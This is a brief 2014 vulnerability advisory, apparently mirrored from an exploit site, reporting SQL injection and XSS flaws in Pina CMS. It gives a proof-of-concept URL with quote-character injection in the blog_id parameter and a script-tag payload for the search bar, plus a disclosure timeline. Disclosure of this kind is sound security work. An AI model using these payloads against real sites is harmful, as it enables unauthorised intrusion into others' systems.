扫码分享
验证:
体验盒子############################################################################
# Title: Pina CMS SQL Injection and XSS Vulnerabilities
# Vendor: www.pinacms.com
# Vendor Notified: 15-02-2014
# Vendor Replied: 16-02-2014
# Release in Public: 18-02-2014
# Tested on: Windows/Linux
# Author/Found by: Shadman Tanjim
# Website: www.secupent.com and www.vulnerability.io
# Email: service@secupent.com or shadman2600@gmail.com
# Twitter: twitter.com/secupent
# Facebook: fb.me/secupent
############################################################################
1. Vulnerability no 1 (SQL Injection):
http://target.com/page.php?action=post.manage.home&blog_id=1%27%22
Demo screenshot: https://www.dropbox.com/s/cpxvk7h1dxu8xnv/pina2.png
2. Vulnerability no 2. (XSS):
Go to this link: http://target.com/page.php?action=post.manage.home
Apply this JavaScript on search bar
"/><script>alert(574127);</script>
Demo screenshot: https://www.dropbox.com/s/8jc51blyepypfas/pina1.png
Greets: Sayem Islam, Maruf Alam, Isti Ak Ahmed, Team BCA, Team Secupent and all Cyber Security Expert and Bug Hunters.....
体验盒子
